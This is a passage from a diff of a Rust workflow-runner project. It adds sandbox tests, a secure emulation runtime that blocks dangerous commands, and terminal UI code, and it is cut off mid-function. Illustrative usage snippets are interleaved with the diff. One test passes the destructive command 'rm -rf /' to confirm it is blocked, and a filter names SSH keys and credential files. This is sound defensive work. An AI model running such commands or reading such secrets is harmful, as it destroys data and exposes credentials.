        assert!(sandbox.validate_command("git clone").is_err());
        assert!(sandbox.validate_command("cargo build").is_err());
    }

    #[test]
    fn test_file_filtering() {
        let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();

        // Should skip dangerous files
        assert!(sandbox.should_skip_file("id_rsa"));
        assert!(sandbox.should_skip_file(".ssh"));
        assert!(sandbox.should_skip_file("credentials"));

        // Should allow safe files
        assert!(!sandbox.should_skip_file("Cargo.toml"));
        assert!(!sandbox.should_skip_file("README.md"));
        assert!(!sandbox.should_skip_file(".gitignore"));
    }
}
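Taken together, a minimal end-to-end sketch of the sandbox API above (an illustration, not code from the diff; it assumes a tokio runtime and that `Sandbox`, `SandboxError` and `create_strict_sandbox_config` are in scope):

```rust
use std::path::Path;

// Validate and execute a single safe command in a strict sandbox.
async fn sandboxed_echo() -> Result<(), SandboxError> {
    let sandbox = Sandbox::new(create_strict_sandbox_config())?;
    let output = sandbox
        .execute_command(&["echo", "hello"], &[("CI", "true")], Path::new("."))
        .await?;
    assert_eq!(output.exit_code, 0);
    println!("{}", output.stdout.trim());
    Ok(())
}
```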
crates/runtime/src/secure_emulation.rs (new file, 339 lines)
@@ -0,0 +1,339 @@
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
|
||||
use async_trait::async_trait;
|
||||
use std::path::Path;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Secure emulation runtime that uses sandboxing for safety
|
||||
pub struct SecureEmulationRuntime {
|
||||
sandbox: Sandbox,
|
||||
}
|
||||
|
||||
impl Default for SecureEmulationRuntime {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SecureEmulationRuntime {
|
||||
/// Create a new secure emulation runtime with default workflow-friendly configuration
|
||||
pub fn new() -> Self {
|
||||
let config = create_workflow_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).expect("Failed to create sandbox");
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");
|
||||
|
||||
Self { sandbox }
|
||||
}
|
||||
|
||||
/// Create a new secure emulation runtime with custom sandbox configuration
|
||||
pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
|
||||
let sandbox = Sandbox::new(config).map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
|
||||
})?;
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");
|
||||
|
||||
Ok(Self { sandbox })
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for SecureEmulationRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
_volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Executing sandboxed command: {} (image: {})",
|
||||
command.join(" "),
|
||||
image
|
||||
));
|
||||
|
||||
// Use sandbox to execute the command safely
|
||||
let result = self
|
||||
.sandbox
|
||||
.execute_command(command, env_vars, working_dir)
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(output) => {
|
||||
wrkflw_logging::info("✅ Sandboxed command completed successfully");
|
||||
Ok(output)
|
||||
}
|
||||
Err(SandboxError::BlockedCommand { command }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
|
||||
This command was blocked for security reasons. \
|
||||
If you need to run this command, please use Docker or Podman mode instead.",
|
||||
command
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::DangerousPattern { pattern }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
|
||||
This command was blocked because it matches a known dangerous pattern. \
|
||||
Please review your workflow for potentially harmful commands.",
|
||||
pattern
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ExecutionTimeout { seconds }) => {
|
||||
let error_msg = format!(
|
||||
"⏰ Command execution timed out after {} seconds. \
|
||||
Consider optimizing your command or increasing timeout limits.",
|
||||
seconds
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::PathAccessDenied { path }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 Path access denied: '{}'. \
|
||||
The sandbox restricts file system access for security.",
|
||||
path
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ResourceLimitExceeded { resource }) => {
|
||||
let error_msg = format!(
|
||||
"📊 Resource limit exceeded: {}. \
|
||||
Your command used too many system resources.",
|
||||
resource
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(e) => {
|
||||
let error_msg = format!("Sandbox execution failed: {}", e);
|
||||
wrkflw_logging::error(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to pull image {}",
|
||||
image
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
_additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// For secure emulation runtime, we'll use a simplified approach
|
||||
// that doesn't require building custom images
|
||||
let base_image = match language {
|
||||
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
|
||||
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
|
||||
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
}),
|
||||
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
|
||||
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
}),
|
||||
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)))
|
||||
}
|
||||
};
|
||||
|
||||
// For emulation, we'll just return the base image
|
||||
// The actual package installation will be handled during container execution
|
||||
Ok(base_image)
|
||||
}
|
||||
}
|
||||
|
||||
/// Handle special actions in secure emulation mode
|
||||
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
|
||||
// Extract owner, repo and version from the action
|
||||
let action_parts: Vec<&str> = action.split('@').collect();
|
||||
let action_name = action_parts[0];
|
||||
let action_version = if action_parts.len() > 1 {
|
||||
action_parts[1]
|
||||
} else {
|
||||
"latest"
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Processing action in secure mode: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// In secure mode, we're more restrictive about what actions we allow
|
||||
match action_name {
|
||||
// Core GitHub actions that are generally safe
|
||||
name if name.starts_with("actions/checkout") => {
|
||||
wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
|
||||
}
|
||||
name if name.starts_with("actions/setup-node") => {
|
||||
wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
|
||||
check_command_available_secure("node", "Node.js", "https://nodejs.org/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-python") => {
|
||||
wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
|
||||
check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-java") => {
|
||||
wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
|
||||
check_command_available_secure("java", "Java", "https://adoptium.net/");
|
||||
}
|
||||
name if name.starts_with("actions/cache") => {
|
||||
wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
|
||||
}
|
||||
|
||||
// Rust-specific actions
|
||||
name if name.starts_with("actions-rs/cargo") => {
|
||||
wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
|
||||
check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/toolchain") => {
|
||||
wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
|
||||
check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/fmt") => {
|
||||
wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
|
||||
check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
}
|
||||
|
||||
// Potentially dangerous actions that we warn about
|
||||
name if name.contains("docker") || name.contains("container") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Docker/container action '{}' is not supported in secure emulation mode. \
|
||||
Use Docker or Podman mode for container actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
name if name.contains("ssh") || name.contains("deploy") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
|
||||
Use Docker or Podman mode for deployment actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
|
||||
// Unknown actions
|
||||
_ => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🟡 Unknown action '{}' in secure emulation mode. \
|
||||
Some functionality may be limited or unavailable.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Check if a command is available, with security-focused messaging
|
||||
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
|
||||
use std::process::Command;
|
||||
|
||||
let is_available = Command::new("which")
|
||||
.arg(command)
|
||||
.output()
|
||||
.map(|output| output.status.success())
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🔧 {} is required but not found on the system",
|
||||
name
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action in secure mode, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Alternatively, use Docker or Podman mode for automatic {} installation",
|
||||
name
|
||||
));
|
||||
} else {
|
||||
// Try to get version information
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Using system {} in secure mode: {}",
|
||||
name,
|
||||
version.trim()
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::sandbox::create_strict_sandbox_config;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_blocks_dangerous_commands() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["rm", "-rf", "/"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_err());
|
||||
let error_msg = result.unwrap_err().to_string();
|
||||
assert!(error_msg.contains("SECURITY BLOCK"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_allows_safe_commands() {
|
||||
let runtime = SecureEmulationRuntime::new();
|
||||
|
||||
// Should allow safe commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["echo", "hello world"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_ok());
|
||||
let output = result.unwrap();
|
||||
assert!(output.stdout.contains("hello world"));
|
||||
assert_eq!(output.exit_code, 0);
|
||||
}
|
||||
}
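For orientation, a hedged usage sketch of the runtime defined above, mirroring its own tests (it assumes `SecureEmulationRuntime`, the `ContainerRuntime` trait and `ContainerError` are in scope and a tokio executor is running):

```rust
use std::path::PathBuf;

async fn run_step() -> Result<(), ContainerError> {
    let runtime = SecureEmulationRuntime::new();
    // The image and volume arguments exist for interface compatibility only;
    // the command actually runs in the local sandbox, not in a container.
    let output = runtime
        .run_container(
            "alpine:latest",
            &["echo", "hello from secure emulation"],
            &[],
            &PathBuf::from("."),
            &[],
        )
        .await?;
    println!("exit code: {}", output.exit_code);
    Ok(())
}
```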
crates/ui/Cargo.toml (new file, 32 lines)
@@ -0,0 +1,32 @@
[package]
name = "wrkflw-ui"
version.workspace = true
edition.workspace = true
description = "Terminal user interface for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
wrkflw-executor = { path = "../executor", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
wrkflw-github = { path = "../github", version = "0.7.0" }

# External dependencies
chrono.workspace = true
crossterm.workspace = true
ratatui.workspace = true
serde.workspace = true
serde_yaml.workspace = true
tokio.workspace = true
serde_json.workspace = true
reqwest = { workspace = true, features = ["json"] }
regex.workspace = true
futures.workspace = true
crates/ui/README.md (new file, 23 lines)
@@ -0,0 +1,23 @@
## wrkflw-ui

Terminal user interface for browsing workflows, running them, and viewing logs.

- Tabs: Workflows, Execution, Logs, Help
- Hotkeys: `1-4`, `Tab`, `Enter`, `r`, `R`, `t`, `v`, `e`, `q`, etc.
- Integrates with `wrkflw-executor` and `wrkflw-logging`

### Example

```rust
use std::path::PathBuf;
use wrkflw_executor::RuntimeType;
use wrkflw_ui::run_wrkflw_tui;

# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

Most users should run the `wrkflw` binary and select TUI mode: `wrkflw tui`.
crates/ui/src/app/mod.rs (new file, 496 lines)
@@ -0,0 +1,496 @@
|
||||
// App module for UI state and main TUI entry point
|
||||
mod state;
|
||||
|
||||
use crate::handlers::workflow::start_next_workflow_execution;
|
||||
use crate::models::{ExecutionResultMsg, Workflow, WorkflowStatus};
|
||||
use crate::utils::load_workflows;
|
||||
use crate::views::render_ui;
|
||||
use chrono::Local;
|
||||
use crossterm::{
|
||||
event::{self, DisableMouseCapture, EnableMouseCapture, Event, KeyCode, KeyModifiers},
|
||||
execute,
|
||||
terminal::{disable_raw_mode, enable_raw_mode, EnterAlternateScreen, LeaveAlternateScreen},
|
||||
};
|
||||
use ratatui::{backend::CrosstermBackend, Terminal};
|
||||
use std::io::{self, stdout};
|
||||
use std::path::PathBuf;
|
||||
use std::sync::mpsc;
|
||||
use std::time::{Duration, Instant};
|
||||
use wrkflw_executor::RuntimeType;
|
||||
|
||||
pub use state::App;
|
||||
|
||||
// Main entry point for the TUI interface
|
||||
#[allow(clippy::ptr_arg)]
|
||||
pub async fn run_wrkflw_tui(
|
||||
path: Option<&PathBuf>,
|
||||
runtime_type: RuntimeType,
|
||||
verbose: bool,
|
||||
preserve_containers_on_failure: bool,
|
||||
) -> io::Result<()> {
|
||||
// Terminal setup
|
||||
enable_raw_mode()?;
|
||||
let mut stdout = stdout();
|
||||
execute!(stdout, EnterAlternateScreen, EnableMouseCapture)?;
|
||||
let backend = CrosstermBackend::new(stdout);
|
||||
let mut terminal = Terminal::new(backend)?;
|
||||
|
||||
// Set up channel for async communication
|
||||
let (tx, rx): (
|
||||
mpsc::Sender<ExecutionResultMsg>,
|
||||
mpsc::Receiver<ExecutionResultMsg>,
|
||||
) = mpsc::channel();
|
||||
|
||||
// Initialize app state
|
||||
let mut app = App::new(
|
||||
runtime_type.clone(),
|
||||
tx.clone(),
|
||||
preserve_containers_on_failure,
|
||||
);
|
||||
|
||||
if app.validation_mode {
|
||||
app.logs.push("Starting in validation mode".to_string());
|
||||
wrkflw_logging::info("Starting in validation mode");
|
||||
}
|
||||
|
||||
// Load workflows
|
||||
let dir_path = match path {
|
||||
Some(path) if path.is_dir() => path.clone(),
|
||||
Some(path) if path.is_file() => {
|
||||
// Single workflow file
|
||||
let name = path
|
||||
.file_name()
|
||||
.unwrap_or_default()
|
||||
.to_string_lossy()
|
||||
.into_owned();
|
||||
|
||||
app.workflows = vec![Workflow {
|
||||
name: name.clone(),
|
||||
path: path.clone(),
|
||||
selected: true,
|
||||
status: WorkflowStatus::NotStarted,
|
||||
execution_details: None,
|
||||
}];
|
||||
|
||||
// Queue the single workflow for execution
|
||||
app.execution_queue = vec![0];
|
||||
app.start_execution();
|
||||
|
||||
// Return parent dir or current dir if no parent
|
||||
path.parent()
|
||||
.map(|p| p.to_path_buf())
|
||||
.unwrap_or_else(|| PathBuf::from("."))
|
||||
}
|
||||
_ => PathBuf::from(".github/workflows"),
|
||||
};
|
||||
|
||||
// Only load directory if we haven't already loaded a single file
|
||||
if app.workflows.is_empty() {
|
||||
app.workflows = load_workflows(&dir_path);
|
||||
}
|
||||
|
||||
// Run the main event loop
|
||||
let tx_clone = tx.clone();
|
||||
|
||||
// Run the event loop
|
||||
let result = run_tui_event_loop(&mut terminal, &mut app, &tx_clone, &rx, verbose);
|
||||
|
||||
// Clean up terminal
|
||||
disable_raw_mode()?;
|
||||
execute!(
|
||||
terminal.backend_mut(),
|
||||
LeaveAlternateScreen,
|
||||
DisableMouseCapture
|
||||
)?;
|
||||
terminal.show_cursor()?;
|
||||
|
||||
match result {
|
||||
Ok(_) => Ok(()),
|
||||
Err(e) => {
|
||||
// If the TUI fails to initialize or crashes, fall back to CLI mode
|
||||
wrkflw_logging::error(&format!("Failed to start UI: {}", e));
|
||||
|
||||
// Only for 'tui' command should we fall back to CLI mode for files
|
||||
// For other commands, return the error
|
||||
if let Some(path) = path {
|
||||
if path.is_file() {
|
||||
wrkflw_logging::error("Falling back to CLI mode...");
|
||||
crate::handlers::workflow::execute_workflow_cli(path, runtime_type, verbose)
|
||||
.await
|
||||
} else if path.is_dir() {
|
||||
crate::handlers::workflow::validate_workflow(path, verbose)
|
||||
} else {
|
||||
Err(e)
|
||||
}
|
||||
} else {
|
||||
Err(e)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to run the main event loop
|
||||
fn run_tui_event_loop(
|
||||
terminal: &mut Terminal<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
tx_clone: &mpsc::Sender<ExecutionResultMsg>,
|
||||
rx: &mpsc::Receiver<ExecutionResultMsg>,
|
||||
verbose: bool,
|
||||
) -> io::Result<()> {
|
||||
// Max time to wait for events - keep this short to ensure UI responsiveness
|
||||
let event_poll_timeout = Duration::from_millis(50);
|
||||
|
||||
// Set up a dedicated tick timer
|
||||
let tick_rate = app.tick_rate;
|
||||
let mut last_tick = Instant::now();
|
||||
|
||||
loop {
|
||||
// Always redraw the UI on each loop iteration to keep it responsive
|
||||
terminal.draw(|f| {
|
||||
render_ui(f, app);
|
||||
})?;
|
||||
|
||||
// Update the UI on every tick
|
||||
if last_tick.elapsed() >= tick_rate {
|
||||
app.tick();
|
||||
app.update_running_workflow_progress();
|
||||
|
||||
// Check for log processing updates (includes system log change detection)
|
||||
app.check_log_processing_updates();
|
||||
|
||||
// Request log processing if needed
|
||||
if app.logs_need_update {
|
||||
app.request_log_processing_update();
|
||||
}
|
||||
|
||||
last_tick = Instant::now();
|
||||
}
|
||||
|
||||
// Non-blocking check for execution results
|
||||
if let Ok((workflow_idx, result)) = rx.try_recv() {
|
||||
app.process_execution_result(workflow_idx, result);
|
||||
app.current_execution = None;
|
||||
|
||||
// Get next workflow to execute using our helper function
|
||||
start_next_workflow_execution(app, tx_clone, verbose);
|
||||
}
|
||||
|
||||
// Start execution if we have a queued workflow and nothing is currently running
|
||||
if app.running && app.current_execution.is_none() && !app.execution_queue.is_empty() {
|
||||
start_next_workflow_execution(app, tx_clone, verbose);
|
||||
}
|
||||
|
||||
// Handle key events with a short timeout
|
||||
if event::poll(event_poll_timeout)? {
|
||||
if let Event::Key(key) = event::read()? {
|
||||
// Handle search input first if we're in search mode and logs tab
|
||||
if app.selected_tab == 2 && app.log_search_active {
|
||||
app.handle_log_search_input(key.code);
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle help overlay scrolling
|
||||
if app.show_help {
|
||||
match key.code {
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
app.scroll_help_up();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
app.scroll_help_down();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Esc | KeyCode::Char('?') => {
|
||||
app.show_help = false;
|
||||
continue;
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
match key.code {
|
||||
KeyCode::Char('q') => {
|
||||
// Exit and clean up
|
||||
break Ok(());
|
||||
}
|
||||
KeyCode::Esc => {
|
||||
if app.detailed_view {
|
||||
app.detailed_view = false;
|
||||
} else if app.show_help {
|
||||
app.show_help = false;
|
||||
} else {
|
||||
// Exit and clean up
|
||||
break Ok(());
|
||||
}
|
||||
}
|
||||
KeyCode::Tab => {
|
||||
// Cycle through tabs
|
||||
app.switch_tab((app.selected_tab + 1) % 4);
|
||||
}
|
||||
KeyCode::BackTab => {
|
||||
// Cycle through tabs backwards
|
||||
app.switch_tab((app.selected_tab + 3) % 4);
|
||||
}
|
||||
KeyCode::Char('1') | KeyCode::Char('w') => app.switch_tab(0),
|
||||
KeyCode::Char('2') | KeyCode::Char('x') => app.switch_tab(1),
|
||||
KeyCode::Char('3') | KeyCode::Char('l') => app.switch_tab(2),
|
||||
KeyCode::Char('4') | KeyCode::Char('h') => app.switch_tab(3),
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
if app.selected_tab == 2 {
|
||||
if !app.log_search_matches.is_empty() {
|
||||
app.previous_search_match();
|
||||
} else {
|
||||
app.scroll_logs_up();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_up();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.previous_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
if app.detailed_view {
|
||||
app.previous_step();
|
||||
} else {
|
||||
app.previous_job();
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
if app.selected_tab == 2 {
|
||||
if !app.log_search_matches.is_empty() {
|
||||
app.next_search_match();
|
||||
} else {
|
||||
app.scroll_logs_down();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_down();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.next_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
if app.detailed_view {
|
||||
app.next_step();
|
||||
} else {
|
||||
app.next_job();
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Char(' ') => {
|
||||
if app.selected_tab == 0 && !app.running {
|
||||
app.toggle_selected();
|
||||
}
|
||||
}
|
||||
KeyCode::Enter => {
|
||||
match app.selected_tab {
|
||||
0 => {
|
||||
// In workflows tab, Enter runs the selected workflow
|
||||
if !app.running {
|
||||
if let Some(idx) = app.workflow_list_state.selected() {
|
||||
app.workflows[idx].selected = true;
|
||||
app.queue_selected_for_execution();
|
||||
app.start_execution();
|
||||
}
|
||||
}
|
||||
}
|
||||
1 => {
|
||||
// In execution tab, Enter shows job details
|
||||
app.toggle_detailed_view();
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
KeyCode::Char('r') => {
|
||||
// Check if shift is pressed - this might be receiving the reset command
|
||||
if key.modifiers.contains(KeyModifiers::SHIFT) {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs.push(format!(
|
||||
"[{}] DEBUG: Shift+r detected - this should be uppercase R",
|
||||
timestamp
|
||||
));
|
||||
wrkflw_logging::info(
|
||||
"Shift+r detected as lowercase - this should be uppercase R",
|
||||
);
|
||||
|
||||
if !app.running {
|
||||
// Reset workflow status with Shift+r
|
||||
app.logs.push(format!(
|
||||
"[{}] Attempting to reset workflow status via Shift+r...",
|
||||
timestamp
|
||||
));
|
||||
app.reset_workflow_status();
|
||||
|
||||
// Force redraw to update UI immediately
|
||||
terminal.draw(|f| {
|
||||
render_ui(f, app);
|
||||
})?;
|
||||
}
|
||||
} else if !app.running {
|
||||
app.queue_selected_for_execution();
|
||||
app.start_execution();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('a') => {
|
||||
if !app.running {
|
||||
// Select all workflows
|
||||
for workflow in &mut app.workflows {
|
||||
workflow.selected = true;
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Char('e') => {
|
||||
if !app.running {
|
||||
app.toggle_emulation_mode();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('v') => {
|
||||
if !app.running {
|
||||
app.toggle_validation_mode();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('n') => {
|
||||
if app.selected_tab == 2 && !app.log_search_query.is_empty() {
|
||||
app.next_search_match();
|
||||
} else if app.selected_tab == 0 && !app.running {
|
||||
// Deselect all workflows
|
||||
for workflow in &mut app.workflows {
|
||||
workflow.selected = false;
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Char('R') => {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs.push(format!(
|
||||
"[{}] DEBUG: Reset key 'Shift+R' pressed",
|
||||
timestamp
|
||||
));
|
||||
wrkflw_logging::info("Reset key 'Shift+R' pressed");
|
||||
|
||||
if !app.running {
|
||||
// Reset workflow status
|
||||
app.logs.push(format!(
|
||||
"[{}] Attempting to reset workflow status...",
|
||||
timestamp
|
||||
));
|
||||
app.reset_workflow_status();
|
||||
|
||||
// Force redraw to update UI immediately
|
||||
terminal.draw(|f| {
|
||||
render_ui(f, app);
|
||||
})?;
|
||||
} else {
|
||||
app.logs.push(format!(
|
||||
"[{}] Cannot reset workflow while another operation is running",
|
||||
timestamp
|
||||
));
|
||||
}
|
||||
}
|
||||
KeyCode::Char('?') => {
|
||||
// Toggle help overlay
|
||||
app.show_help = !app.show_help;
|
||||
}
|
||||
KeyCode::Char('t') => {
|
||||
// Only trigger workflow if not already running and we're in the workflows tab
|
||||
if !app.running && app.selected_tab == 0 {
|
||||
if let Some(selected_idx) = app.workflow_list_state.selected() {
|
||||
if selected_idx < app.workflows.len() {
|
||||
let workflow = &app.workflows[selected_idx];
|
||||
if workflow.status == WorkflowStatus::NotStarted {
|
||||
app.trigger_selected_workflow();
|
||||
} else if workflow.status == WorkflowStatus::Running {
|
||||
app.logs.push(format!(
|
||||
"Workflow '{}' is already running",
|
||||
workflow.name
|
||||
));
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Workflow '{}' is already running",
|
||||
workflow.name
|
||||
));
|
||||
} else {
|
||||
// First, get all the data we need from the workflow
|
||||
let workflow_name = workflow.name.clone();
|
||||
let status_text = match workflow.status {
|
||||
WorkflowStatus::Success => "Success",
|
||||
WorkflowStatus::Failed => "Failed",
|
||||
WorkflowStatus::Skipped => "Skipped",
|
||||
_ => "current",
|
||||
};
|
||||
let needs_reset_hint = workflow.status
|
||||
== WorkflowStatus::Success
|
||||
|| workflow.status == WorkflowStatus::Failed
|
||||
|| workflow.status == WorkflowStatus::Skipped;
|
||||
|
||||
// Now set the status message (mutable borrow)
|
||||
app.set_status_message(format!(
|
||||
"Cannot trigger workflow '{}' in {} state. Press Shift+R to reset.",
|
||||
workflow_name,
|
||||
status_text
|
||||
));
|
||||
|
||||
// Add log entries
|
||||
app.logs.push(format!(
|
||||
"Cannot trigger workflow '{}' in {} state",
|
||||
workflow_name, status_text
|
||||
));
|
||||
|
||||
// Add hint about using reset
|
||||
if needs_reset_hint {
|
||||
let timestamp =
|
||||
Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs.push(format!(
|
||||
"[{}] Hint: Press 'Shift+R' to reset the workflow status and allow triggering",
|
||||
timestamp
|
||||
));
|
||||
}
|
||||
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Cannot trigger workflow in {} state",
|
||||
status_text
|
||||
));
|
||||
}
|
||||
}
|
||||
} else {
|
||||
app.logs.push("No workflow selected to trigger".to_string());
|
||||
wrkflw_logging::warning("No workflow selected to trigger");
|
||||
}
|
||||
} else if app.running {
|
||||
app.logs.push(
|
||||
"Cannot trigger workflow while another operation is in progress"
|
||||
.to_string(),
|
||||
);
|
||||
